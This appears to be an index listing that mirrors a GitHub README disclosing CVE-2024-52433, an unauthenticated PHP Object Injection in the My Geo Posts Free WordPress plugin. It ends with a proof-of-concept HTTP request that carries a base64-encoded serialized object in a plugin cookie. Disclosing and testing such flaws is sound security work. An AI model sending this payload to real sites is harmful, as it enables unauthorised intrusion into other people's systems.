Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/cve-2024-52433
My Geo Posts Free <= 1.2 - Unauthenticated PHP Object Injection
https://github.com/randomrobbiebf/cve-2024-52433
Last synced: 12 days ago
JSON representation
My Geo Posts Free <= 1.2 - Unauthenticated PHP Object Injection
- Host: GitHub
- URL: https://github.com/randomrobbiebf/cve-2024-52433
- Owner: RandomRobbieBF
- Created: 2024-11-22T08:56:58.000Z (about 1 month ago)
- Default Branch: main
- Last Pushed: 2024-11-22T08:58:27.000Z (about 1 month ago)
- Last Synced: 2024-11-22T09:30:50.784Z (about 1 month ago)
- Size: 0 Bytes
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CVE-2024-52433
My Geo Posts Free <= 1.2 - Unauthenticated PHP Object Injection# Description
The My Geo Posts Free plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.2 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
Download Link: [Download my-geo-posts-free Version 1.2](https://downloads.wordpress.org/plugin/my-geo-posts-free.1.2.zip)
```
Type: plugin
CVSS Score: 9.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2024-52433
Slug: my-geo-posts-free
```POC
---```
GET / HTTP/2
Host: wp-dev.ddev.site
Cookie: mgpf_geo_coockie=TzoyMDoiUEhQX09iamVjdF9JbmplY3Rpb24iOjA6e30=
```